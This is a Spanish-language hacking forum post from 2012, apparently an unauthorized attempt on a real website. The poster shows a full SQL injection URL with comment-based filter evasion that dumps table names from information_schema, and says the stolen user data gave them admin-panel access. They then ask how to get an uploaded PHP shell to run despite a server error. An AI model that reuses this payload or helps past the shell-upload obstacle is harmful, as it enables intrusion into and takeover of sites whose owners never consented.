Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - martinmartinez

#1
Nivel Web / Shell PHP
19 Marzo 2012, 19:43 PM
Buenos días.
Hace unos días que vengo intentando romper con la seguridad de un sitio.

Mi primer pared fue la explotación de una SQLi bastante complicada:
Citarhttp://web.com.ar/archivo.php?param1=1&id=%281%29and%280%29union+%23xDxD%0A%23as%0A%23xDxD%0A%23asd%0Aselect+0x53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f,2,3,group_concat%28table_name,0x3c48523e%29,5,6+from+%23asd%0A+information_schema%23asd%0A.%23asd%0Atables--

Después de mucho trabajo pude acceder a los datos, entre ellos los usuarios. Accedí al panel de administración y me encontre con un input file que me permite subir cualquier tipo de archivo a una carpeta del servidor.

El problema aquí es que no puedo ejecutar archivos .php ya que me devuelve un:
CitarInternal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@***** and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Probé llamar al archivo .php desde un html con un iframe pero el problema persiste.
Consulto a ustedes que tienen mucho más experiencia:
¿Hay alguna otra posibildad?

Gracias